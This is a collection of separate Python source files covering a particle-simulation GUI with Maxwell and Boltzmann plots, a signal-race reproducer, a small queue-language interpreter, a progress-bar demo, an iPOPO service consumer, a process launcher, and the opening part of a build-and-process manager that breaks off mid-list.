| source | python |
|---|---|
pib.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import argv
from PySide import QtGui, QtCore
from PySide.QtOpenGL import QGLWidget
from particles.gui import Ui_NewExperimentWindow, Ui_DemonstrationWindow
from particles.simulation import Simulator, Playback
from OpenGL.GL import (glShadeModel, glClearColor, glClearDepth, glEnable,
glMatrixMode, glDepthFunc, glHint, glOrtho,
glViewport, glLoadIdentity, glClear,
glColor3f, glLineWidth,
GL_SMOOTH, GL_DEPTH_TEST, GL_PROJECTION, GL_LEQUAL,
GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST,
GL_MODELVIEW, GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT,
GL_TRIANGLE_FAN, GL_LINE_STRIP, GL_VERTEX_ARRAY,
glEnableClientState, GL_DOUBLE, glVertexPointer,
glDrawArrays, glColorPointer, GL_UNSIGNED_BYTE,
GL_COLOR_ARRAY, glDisableClientState)
import OpenGL.arrays.vbo as glvbo
import datetime
import os.path
import struct
import argparse
import numpy as np
import signal
import subprocess
import threading
import collections
from math import sin, cos, radians, pi
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
EXEC_CMD = os.path.join(BASE_PATH, "pib-generate")
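# simulate() launches the external "pib-generate" binary (expected next to this
# script, see EXEC_CMD) and streams its progress output into the caller's deque
# from a daemon thread, so the GUI can poll the most recent progress value.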
def read_from_pipe(process, append_func):
for line in iter(process.stdout.readline, ""):
append_func(line)
def simulate(box_width: float, box_height: float,
delta_v_top: float, delta_v_bottom: float,
delta_v_side: float,
barrier_x: float, barrier_width: float, hole_y: float,
hole_height: float,
min_to_simulate: int,
output_file: str,
v_loss: float, particle_r: float,
deque: collections.deque,
n_left: int = 500, n_right: int = 500,
v_init: float = 0.0,
g: float = 9.8,
fps: int = 30,
):
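    # NOTE: the external pib-generate binary is assumed to take these
    # parameters positionally, in exactly the order built below.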
params = [str(x) for x in (n_left, n_right, particle_r, v_init, v_loss,
box_width, box_height, barrier_x, barrier_width,
hole_y, hole_height, delta_v_top,
delta_v_bottom, delta_v_side, g,
min_to_simulate, fps, output_file)]
process = subprocess.Popen([EXEC_CMD] + params, stdout=subprocess.PIPE,
bufsize=1, universal_newlines=True)
t = threading.Thread(target=read_from_pipe, args=(process, deque.append))
t.daemon = True
t.start()
return process
class ParticleWidget(QGLWidget):
COLOR_LEFT = (255, 0, 0)
COLOR_RIGHT = (0, 255, 0)
def __init__(self, playback, parent=None):
super(ParticleWidget, self).__init__(parent=parent)
self.playback = playback
particle_r = playback.simulator.particle_r
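        # Precompute vertex offsets approximating a circle of radius particle_r
        # (one point every 45 degrees plus the particle centre), so each
        # particle can be drawn with a single GL_TRIANGLE_FAN draw call.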
self.xy_offset = np.vstack((
np.array([(particle_r * cos(radians(x)),
particle_r * sin(radians(x)))
for x in range(0, 361, 45)]),
(0, 0)
))
self.xy_size = self.xy_offset.shape[0]
self.update_particle_data()
self.initializeGL()
self.paintGL()
def initializeGL(self):
glShadeModel(GL_SMOOTH)
glClearColor(0.05, 0.05, 0.05, 1.0)
glClearDepth(1.0)
glEnable(GL_DEPTH_TEST)
glMatrixMode(GL_PROJECTION)
glDepthFunc(GL_LEQUAL)
glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)
self.vbo_xy = glvbo.VBO(self.particle_xy)
self.vbo_color = glvbo.VBO(self.particle_color)
simulator = self.playback.simulator
self.vbo_barrier = glvbo.VBO(np.array([
simulator.barrier_x_left, simulator.box_height,
simulator.barrier_x_left, simulator.hole_y_top,
simulator.barrier_x_right, simulator.hole_y_top,
simulator.barrier_x_right, simulator.box_height,
simulator.barrier_x_left, 0,
simulator.barrier_x_left, simulator.hole_y_bottom,
simulator.barrier_x_right, simulator.hole_y_bottom,
simulator.barrier_x_right, 0,
]))
def update_particle_data(self):
self.particle_xy = np.array([(p.pos_x + x, p.pos_y + y)
for p in
self.playback.simulator.particles
for (x, y) in self.xy_offset])
self.particle_color = np.array([x
for p in
self.playback.simulator.particles
for i in range(self.xy_size)
for x in
(self.COLOR_RIGHT if p.id & 1
else self.COLOR_LEFT)
], dtype=np.ubyte)
def resizeGL(self, width, height):
glViewport(0, 0, width, height)
glOrtho(0.0, self.playback.simulator.box_width,
0.0, self.playback.simulator.box_height,
0.0, 1.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def clearGL(self):
glClearColor(0.05, 0.05, 0.05, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
def deleteBuffers(self):
self.vbo_color.unbind()
self.vbo_barrier.unbind()
self.vbo_xy.unbind()
del self.vbo_color
del self.vbo_barrier
del self.vbo_xy
def paintGL(self):
self.clearGL()
glLoadIdentity()
simulator = self.playback.simulator
self.update_particle_data()
glEnableClientState(GL_COLOR_ARRAY)
self.vbo_color.set_array(self.particle_color)
self.vbo_color.bind()
glColorPointer(3, GL_UNSIGNED_BYTE, 0, self.vbo_color)
self.vbo_color.unbind()
glEnableClientState(GL_VERTEX_ARRAY)
self.vbo_xy.set_array(self.particle_xy)
self.vbo_xy.bind()
glVertexPointer(2, GL_DOUBLE, 0, self.vbo_xy)
particle_size = self.xy_size
for i in range(len(simulator)):
glDrawArrays(GL_TRIANGLE_FAN, i * particle_size, particle_size)
glDisableClientState(GL_COLOR_ARRAY)
self.vbo_xy.unbind()
glColor3f(1, 1, 1)
glLineWidth(2)
self.vbo_barrier.bind()
glVertexPointer(2, GL_DOUBLE, 0, self.vbo_barrier)
glDrawArrays(GL_LINE_STRIP, 0, 4)
glDrawArrays(GL_LINE_STRIP, 4, 4)
self.vbo_barrier.unbind()
def on_render_scene(self):
self.paintGL()
self.updateGL()
class DemonstrationWindow(QtGui.QMainWindow):
def __init__(self, file_name, parent=None):
super(DemonstrationWindow, self).__init__(parent=parent)
self.playback = Playback(file_name)
self.ui = Ui_DemonstrationWindow()
self.ui.setupUi(self)
self.label_time_original = self.ui.label_time.text()
self.ui.canvas = ParticleWidget(self.playback,
parent=self.ui.frame_player)
self.ui.canvas.setFixedSize(self.ui.frame_player.size())
self.ui.current_state.setMaximum(len(self.playback))
self.ui.button_play.clicked.connect(self.on_button_play_pressed)
self.stopped = False
self.timer = QtCore.QTimer(parent=self)
self.timer.timeout.connect(self.on_timer_executed)
self.ui.current_state.sliderPressed.connect(
self.on_scrollbar_pressed)
self.ui.current_state.sliderReleased.connect(
self.on_scrollbar_released)
self.ui.current_state.valueChanged.connect(
self.on_scrollbar_value_changed)
self.ui.button_backward.clicked.connect(self.previous_state)
self.ui.button_forward.clicked.connect(self.next_state)
self.ui.plot_maxwell.setTitle("Maxwell distribution")
self.ui.plot_maxwell.setLabel('bottom', 'Speed', units='m/s')
self.ui.plot_maxwell.setLabel('left', 'Number of particles',
units='')
self.ui.plot_boltzmann.setTitle("Boltzmann distribution")
self.ui.plot_boltzmann.setLabel('bottom', 'height', units='m')
self.ui.plot_boltzmann.setLabel('left', 'Number of particles',
units='')
self.start_playback()
def closeEvent(self, *args, **kwargs):
self.ui.canvas.deleteBuffers()
def stop_playback(self):
self.stopped = True
self.ui.button_play.setText("▷")
self.timer.stop()
def launch_timer(self):
fps = self.ui.fps.value()
time_step = int(1000 / fps)
self.timer.start(time_step)
def start_playback(self):
self.stopped = False
self.launch_timer()
self.ui.button_play.setText("▯▯")
def update_boltzmann_plot(self, data):
self.ui.plot_boltzmann.clear()
data_sorted = sorted((x.pos_y for x in data), reverse=True)
y, x = np.histogram(data_sorted, bins=20, density=True)
self.ui.plot_boltzmann.plot(x, y, stepMode=True, fillLevel=0,
brush=(126, 5, 80, 150))
def update_maxwell_plot(self, data):
self.ui.plot_maxwell.clear()
data_sorted = sorted((x.speed() for x in data), reverse=True)
y, x = np.histogram(data_sorted, bins=20, density=True)
self.ui.plot_maxwell.plot(x, y, stepMode=True, fillLevel=0,
brush=(126, 5, 80, 150))
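        # Overlay the theoretical Maxwell speed distribution written in terms of
        # the most probable speed v_p, estimated as the mode of the histogram:
        #   f(v) = 4 / (sqrt(pi) * v_p**3) * v**2 * exp(-v**2 / v_p**2)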
v_probable = x[np.argmax(y)]
offset = np.max(np.diff(x)) / 2
k = 4 / np.sqrt(pi) * ((1 / v_probable) ** 3)
y_theoretical = np.array(
[k * (val * val) * np.exp(-(val * val) / (v_probable * v_probable))
for val in x])
self.ui.plot_maxwell.plot(np.add(x, offset), y_theoretical,
stepMode=False,
brush=(255, 255, 255, 255))
def update_plot(self, data):
"""
        Update plots
        This method calls the helper methods that plot specific data,
        i.e. the Maxwell and Boltzmann distributions.
        The data passed in is a copy of the original particles, so any
        manipulation is safe.
:param data:
:return:
"""
self.update_maxwell_plot(data)
self.update_boltzmann_plot(data)
def previous_state(self):
try:
self.ui.current_state.setValue(
self.ui.current_state.value() - 1)
except (IOError, struct.error, ValueError) as err:
self.stop_playback()
def next_state(self):
try:
self.ui.current_state.setValue(
self.ui.current_state.value() + 1)
except (IOError, struct.error, ValueError) as err:
self.stop_playback()
def on_timer_executed(self):
if self.stopped or self.sender() != self.timer:
return
self.next_state()
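        # Restart the timer through launch_timer() so a changed FPS value in
        # the UI takes effect on the next tick.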
self.launch_timer()
def on_button_play_pressed(self):
if self.stopped:
self.start_playback()
else:
self.stop_playback()
def on_scrollbar_pressed(self):
self.timer.stop()
def on_scrollbar_released(self):
if not self.stopped:
self.launch_timer()
def on_scrollbar_value_changed(self, new_state):
try:
self.playback.set_state(new_state)
self.ui.canvas.on_render_scene()
self.ui.label_time.setText(
self.label_time_original.format(
time=self.playback.simulator.time_elapsed
)
)
self.update_plot(self.playback.simulator.state())
except (IOError, ValueError):
pass
class NewExperimentWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(NewExperimentWindow, self).__init__(parent=parent)
# Set up UI
self.ui = Ui_NewExperimentWindow()
self.ui.setupUi(self)
self.ui.label_clear_file_name.setVisible(False)
self.label_input_text = self.ui.label_input_file_name.text()
self.input_file = None
self.ui.label_input_file_name.mouseReleaseEvent = self.set_input_file_path_on_click
self.ui.label_clear_file_name.mouseReleaseEvent = self.clear_input_file_path_on_click
self.ui.output_file.setText(datetime.datetime.now().strftime(
"particles_in_box_%Y-%m-%d-%H-%M.bin"))
# Connect slots to signals
self.ui.button_run.clicked.connect(self.run_simulation)
# File selection dialog
self.ui.output_file_button.clicked.connect(
self.set_output_file_path)
def set_input_file(self, file_path):
self.input_file = file_path
if file_path:
self.ui.label_clear_file_name.setVisible(True)
self.ui.label_input_file_name.setText(
"Opening file: {file_path}".format(
file_path=os.path.basename(file_path))
)
self.ui.box_width.setEnabled(False)
self.ui.box_height.setEnabled(False)
self.ui.delta_v_top.setEnabled(False)
self.ui.delta_v_bottom.setEnabled(False)
self.ui.delta_v_side.setEnabled(False)
self.ui.barrier_x.setEnabled(False)
self.ui.barrier_width.setEnabled(False)
self.ui.hole_y.setEnabled(False)
self.ui.hole_height.setEnabled(False)
self.ui.v_loss.setEnabled(False)
self.ui.particle_r.setEnabled(False)
self.ui.g.setEnabled(False)
self.ui.n_left.setEnabled(False)
self.ui.n_right.setEnabled(False)
self.ui.v_init.setEnabled(False)
self.ui.fps.setEnabled(False)
self.ui.simulation_time.setEnabled(False)
self.ui.output_file.setEnabled(False)
self.ui.output_file_button.setEnabled(False)
else:
self.ui.label_input_file_name.setText(self.label_input_text)
self.ui.label_clear_file_name.setVisible(False)
self.ui.box_width.setEnabled(True)
self.ui.box_height.setEnabled(True)
self.ui.delta_v_top.setEnabled(True)
self.ui.delta_v_bottom.setEnabled(True)
self.ui.delta_v_side.setEnabled(True)
self.ui.barrier_x.setEnabled(True)
self.ui.barrier_width.setEnabled(True)
self.ui.hole_y.setEnabled(True)
self.ui.hole_height.setEnabled(True)
self.ui.v_loss.setEnabled(True)
self.ui.particle_r.setEnabled(True)
self.ui.g.setEnabled(True)
self.ui.n_left.setEnabled(True)
self.ui.n_right.setEnabled(True)
self.ui.v_init.setEnabled(True)
self.ui.fps.setEnabled(True)
self.ui.simulation_time.setEnabled(True)
self.ui.output_file.setEnabled(True)
self.ui.output_file_button.setEnabled(True)
def set_input_file_path_on_click(self, ev):
file_path, _ = QtGui.QFileDialog.getOpenFileName(self, 'Open:',
filter="*.bin")
self.set_input_file(file_path or None)
def clear_input_file_path_on_click(self, ev):
self.set_input_file(None)
def set_output_file_path(self):
file_path, _ = QtGui.QFileDialog.getSaveFileName(self, 'Save as:',
filter="*.bin")
self.ui.output_file.setText(file_path)
def run_simulation(self):
if self.input_file:
demo_window = DemonstrationWindow(self.input_file, parent=self)
demo_window.show()
self.hide()
return
box_width = self.ui.box_width.value()
box_height = self.ui.box_height.value()
delta_v_top = self.ui.delta_v_top.value()
delta_v_bottom = self.ui.delta_v_bottom.value()
delta_v_side = self.ui.delta_v_side.value()
barrier_x = self.ui.barrier_x.value()
barrier_width = self.ui.barrier_width.value()
hole_y = self.ui.hole_y.value()
hole_height = self.ui.hole_height.value()
v_loss = self.ui.v_loss.value()
particle_r = self.ui.particle_r.value()
g = self.ui.g.value()
n_left = self.ui.n_left.value()
n_right = self.ui.n_right.value()
v_init = self.ui.v_init.value()
fps = self.ui.fps.value()
min_to_simulate = self.ui.simulation_time.value()
output_file = self.ui.output_file.text()
try:
self.dialog = QtGui.QProgressDialog(
"Simulating into " + os.path.basename(output_file),
"Cancel",
0,
min_to_simulate * 60)
self.dialog.show()
self.dialog.setValue(0)
self.progress = collections.deque(maxlen=1)
self.simulator = simulate(n_left=n_left,
n_right=n_right,
particle_r=particle_r,
v_init=v_init,
v_loss=v_loss,
box_width=box_width,
box_height=box_height,
barrier_x=barrier_x,
barrier_width=barrier_width,
hole_y=hole_y,
hole_height=hole_height,
delta_v_top=delta_v_top,
delta_v_bottom=delta_v_bottom,
delta_v_side=delta_v_side,
g=g,
min_to_simulate=min_to_simulate,
fps=fps,
output_file=output_file,
deque=self.progress)
self.hide()
self.timer = QtCore.QTimer(parent=self)
self.timer.start(100)
self.timer.timeout.connect(self.update_progress)
except IOError as e:
QtGui.QMessageBox.critical(self, "Error!", str(e))
def update_progress(self):
try:
result = self.progress.pop()
self.dialog.setValue(int(result))
except IndexError: # if empty or finished
if self.simulator.poll() is not None:
self.timer.stop()
window = DemonstrationWindow(self.ui.output_file.text(),
parent=self)
window.show()
# otherwise, do nothing
def sigint_handler(*args):
QtGui.QApplication.quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, sigint_handler)
parser = argparse.ArgumentParser()
parser.add_argument("input", nargs="?",
type=argparse.FileType(mode="rb"),
default=None)
args = parser.parse_args()
app = QtGui.QApplication(argv)
if args.input:
main_window = DemonstrationWindow(args.input.name)
else:
main_window = NewExperimentWindow()
main_window.show()
    # A timer is used so the interpreter wakes up periodically and can handle SIGINT
timer = QtCore.QTimer()
timer.start(500)
timer.timeout.connect(lambda: None)
exit(app.exec_())
|
wakeup-fd-racer.py
|
import os
import signal
import threading
import time
import socket
import select
import itertools
# Equivalent to the C function raise(), which Python doesn't wrap
if os.name == "nt":
import cffi
_ffi = cffi.FFI()
_ffi.cdef("int raise(int);")
_lib = _ffi.dlopen("api-ms-win-crt-runtime-l1-1-0.dll")
signal_raise = getattr(_lib, "raise")
else:
def signal_raise(signum):
# Use pthread_kill to make sure we're actually using the wakeup fd on
# Unix
signal.pthread_kill(threading.get_ident(), signum)
def raise_SIGINT_soon():
time.sleep(1)
signal_raise(signal.SIGINT)
# Sending 2 signals becomes reliable, as we'd expect (because we need
# set-flags -> write-to-fd, and doing it twice does
# write-to-fd -> set-flags -> write-to-fd -> set-flags)
#signal_raise(signal.SIGINT)
def drain(sock):
total = 0
try:
while True:
total += len(sock.recv(1024))
except BlockingIOError:
pass
return total
def main():
writer, reader = socket.socketpair()
writer.setblocking(False)
reader.setblocking(False)
signal.set_wakeup_fd(writer.fileno())
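    # From here on, CPython's C-level signal handler also writes a byte to this
    # fd whenever a signal arrives; that write is what should wake up select().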
# Keep trying until we lose the race...
for attempt in itertools.count():
print(f"Attempt {attempt}: start")
# Make sure the socket is empty
drained = drain(reader)
if drained:
print(f"Attempt {attempt}: ({drained} residual bytes discarded)")
# Arrange for SIGINT to be delivered 1 second from now
thread = threading.Thread(target=raise_SIGINT_soon)
thread.start()
# Fake an IO loop that's trying to sleep for 10 seconds (but will
# hopefully get interrupted after just 1 second)
start = time.perf_counter()
target = start + 10
try:
select_calls = 0
drained = 0
while True:
now = time.perf_counter()
if now > target:
break
select_calls += 1
r, _, _ = select.select([reader], [], [], target - now)
if r:
# In theory we should loop to fully drain the socket but
# honestly there's 1 byte in there at most and it'll be
# fine.
drained += drain(reader)
except KeyboardInterrupt:
pass
else:
print(f"Attempt {attempt}: no KeyboardInterrupt?!")
# We expect a successful run to take 1 second, and a failed run to
# take 10 seconds, so 2 seconds is a reasonable cutoff to distinguish
# them.
duration = time.perf_counter() - start
if duration < 2:
print(f"Attempt {attempt}: OK, trying again "
f"(select_calls = {select_calls}, drained = {drained})")
else:
print(f"Attempt {attempt}: FAILED, took {duration} seconds")
print(f"select_calls = {select_calls}, drained = {drained}")
break
thread.join()
if __name__ == "__main__":
main()
|
5D.py
|
from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(67108864)
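# Interpreter for the "Quack" queue-machine language: the program is read from
# quack.in, values live on a FIFO queue (kept modulo 65536) plus 26 registers
# 'a'..'z', and output goes to quack.out. main() runs in a separate thread with
# an enlarged stack (see the bottom of the file).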
def main():
file_input = open("quack.in", 'r')
file_output = open("quack.out", 'w')
current = file_input.readline().strip()
actions, marks = [], []
def move_to(mark):
for i in range(len(marks)):
if marks[i][0] == mark:
return marks[i][1]
return
def validate_que(length):
        return length == 0
class ImplementedQueue():
def __init__(self):
self.que = []
self.head = 0
self.tail = 0
def push_value(self, value):
self.que += ['']
self.que[self.tail] = value
self.tail += 1
def pop_value(self):
try:
if validate_que(self.tail - self.head):
return
else:
self.head += 1
return self.que[self.head - 1]
except IndexError:
return
Quack = ImplementedQueue()
registers = [0] * 26
while (current):
actions.append(current)
current = file_input.readline().strip()
for i in range(len(actions)):
if actions[i][0] == ':':
marks.append([actions[i][1:], i])
i, current_action = 0, ''
a, b, temp = 0, 0, 0
#print(actions)
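    # Instruction dispatch: a bare number pushes onto the queue; '+', '-', '*',
    # '/', '%' pop two values and push the result modulo 65536; '>r' pops into
    # register r and '<r' pushes register r; 'P'/'C' print a number/character;
    # ':label' defines a label, 'J'/'Z'/'E'/'G' are (conditional) jumps resolved
    # via move_to(); 'Q' terminates the program.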
while i < len(actions):
current_action = actions[i]
if current_action[0] == 'Q':
break
elif current_action[0] == '+':
Quack.push_value((Quack.pop_value() + Quack.pop_value()) % 65536)
elif current_action[0] == '-':
Quack.push_value((Quack.pop_value() - Quack.pop_value()) % 65536)
elif current_action[0] == '*':
Quack.push_value((Quack.pop_value() * Quack.pop_value()) % 65536)
elif current_action[0] == '/':
a, b = Quack.pop_value(), Quack.pop_value()
if b == 0:
Quack.push_value(0)
else:
Quack.push_value((a // b) % 65536)
elif current_action[0] == '%':
a, b = Quack.pop_value(), Quack.pop_value()
if b == 0:
Quack.push_value(0)
else:
Quack.push_value((a % b) % 65536)
elif current_action[0] == '>':
registers[ord(current_action[1]) - ord('a')] = Quack.pop_value()
#print(registers[ord(current_action[1]) - ord('a')])
elif current_action[0] == '<':
Quack.push_value(registers[ord(current_action[1]) - ord('a')])
elif current_action[0] == 'P':
if len(current_action) > 1:
temp = registers[ord(current_action[1]) - ord('a')]
else:
temp = Quack.pop_value()
print(temp, file=file_output)
elif current_action[0] == 'C':
if len(current_action) > 1:
temp = registers[ord(current_action[1]) - ord('a')]
else:
temp = Quack.pop_value()
print(chr(temp % 256), end='', file=file_output)
elif current_action[0] == ':':
i += 1
i -= 1
elif current_action[0] == 'J':
i = move_to(actions[i][1:])
elif current_action[0] == 'Z':
if registers[ord(current_action[1]) - ord('a')] == 0:
i = move_to(actions[i][2:])
elif current_action[0] == 'E':
if registers[ord(current_action[1]) - ord('a')] == registers[ord(current_action[2]) - ord('a')]:
i = move_to(actions[i][3:])
elif current_action[0] == 'G':
if registers[ord(current_action[1]) - ord('a')] > registers[ord(current_action[2]) - ord('a')]:
i = move_to(actions[i][3:])
else:
Quack.push_value(int(current_action))
#print(current_action)
i += 1
#print(registers)
file_output.close()
thread = threading.Thread(target=main)
thread.start()
|
a-lot-of-parallel-tasks.py
|
#!/usr/bin/env python
"""
More complex demonstration of what's possible with the progress bar.
"""
from __future__ import unicode_literals
from prompt_toolkit.shortcuts.progress_bar import progress_bar
from prompt_toolkit import HTML
import random
import threading
import time
def main():
with progress_bar(
title=HTML('<b>Example of many parallel tasks.</b>'),
bottom_toolbar=HTML('<b>[Control-L]</b> clear <b>[Control-C]</b> abort')) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = []
for i in range(160):
label = 'Task %i' % i
total = random.randrange(50, 200)
sleep_time = random.randrange(5, 20) / 100.
threads.append(threading.Thread(target=run_task, args=(label, total, sleep_time)))
for t in threads:
t.daemon = True
t.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in threads:
while t.is_alive():
t.join(timeout=.5)
if __name__ == '__main__':
main()
|
consumer.py
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Greeting service consumer
:author: Thomas Calmant
:copyright: Copyright 2015, Thomas Calmant
:license: Apache License 2.0
..
Copyright 2015 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Module version
__version_info__ = (0, 5, 9)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
# iPOPO decorators
from pelix.ipopo.decorators import ComponentFactory, Requires, Instantiate, \
BindField, UnbindField, Validate
# Pelix constants
import pelix.constants
# Standard library
import threading
# ------------------------------------------------------------------------------
# Service specification
SERVICE_SPECIFICATION = "sample.grettings"
# ------------------------------------------------------------------------------
@ComponentFactory("hello-world-consumer")
@Requires("_services", SERVICE_SPECIFICATION, aggregate=True, optional=True)
@Instantiate("consumer")
class HelloWorldConsumer(object):
"""
Simple greeting service consumer
"""
def __init__(self):
"""
Sets up members
"""
self._services = []
self._fw_uid = None
def _use_service(self, service):
"""
Calls the given greeting service
:param service: A greeting service
"""
service.sayHello("from {0} (Pelix framework)".format(self._fw_uid))
@BindField('_services', if_valid=True)
def bind_greeting(self, field, service, reference):
"""
A greeting service has been bound
:param field: Name of the injected field
:param service: The injected service
:param reference: Reference of the injected service
"""
# Trace something
print("A new greeting service has been bound")
# Use the service. Use a thread to avoid locking iPOPO for too long
threading.Thread(target=self._use_service, args=[service]).start()
@UnbindField('_services', if_valid=True)
def unbind_greeting(self, field, service, reference):
"""
        A greeting service has gone away
:param field: Name of the injected field
:param service: The injected service
:param reference: Reference of the injected service
"""
# Trace something
print("A greeting service is gone")
        # Avoid using the service here, as its proxy might have already been
# disconnected
@Validate
def validate(self, context):
"""
Component validated
:param context: Bundle context
"""
# Get the framework UID
self._fw_uid = context.get_property(pelix.constants.FRAMEWORK_UID)
# Print it
print("This framework has UID: {0}".format(self._fw_uid))
# Use existing services
for service in self._services:
# Use the service. Use a thread to avoid locking iPOPO for too long
threading.Thread(target=self._use_service, args=[service]).start()
|
sitealgo_main.py
|
# - config: The path to the config file for the site algo
#
# Usage: python -m sitealgo_main -config=../config/sitealgo_config.json
import sys
sys.path.append('../')
from sitealgo.site_algo import SiteAlgo
import multiprocessing
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("-config", "--config", default="../config/sitealgo0_config.json", help="Path to the config file")
args = parser.parse_args()
if __name__ == "__main__":
node = SiteAlgo(args.config)
serverProcess = multiprocessing.Process(target=node.serve)
serverProcess.start()
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict, List
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.swaglog import cloudlog, add_logentries_handler
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
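# unblock_stdout() forks the manager onto a pseudo-terminal: the parent relays
# the child's output through a non-blocking stdout, forwards SIGINT/SIGTERM to
# the child, and finally exits with the child's exit status.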
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
    # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Run scons
spinner = Spinner()
spinner.update("0")
if __name__ != "__main__":
spinner.close()
def build():
for retry in [False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
        # Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
#"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
#"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
#"tombstoned": "selfdrive.tombstoned",
#"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
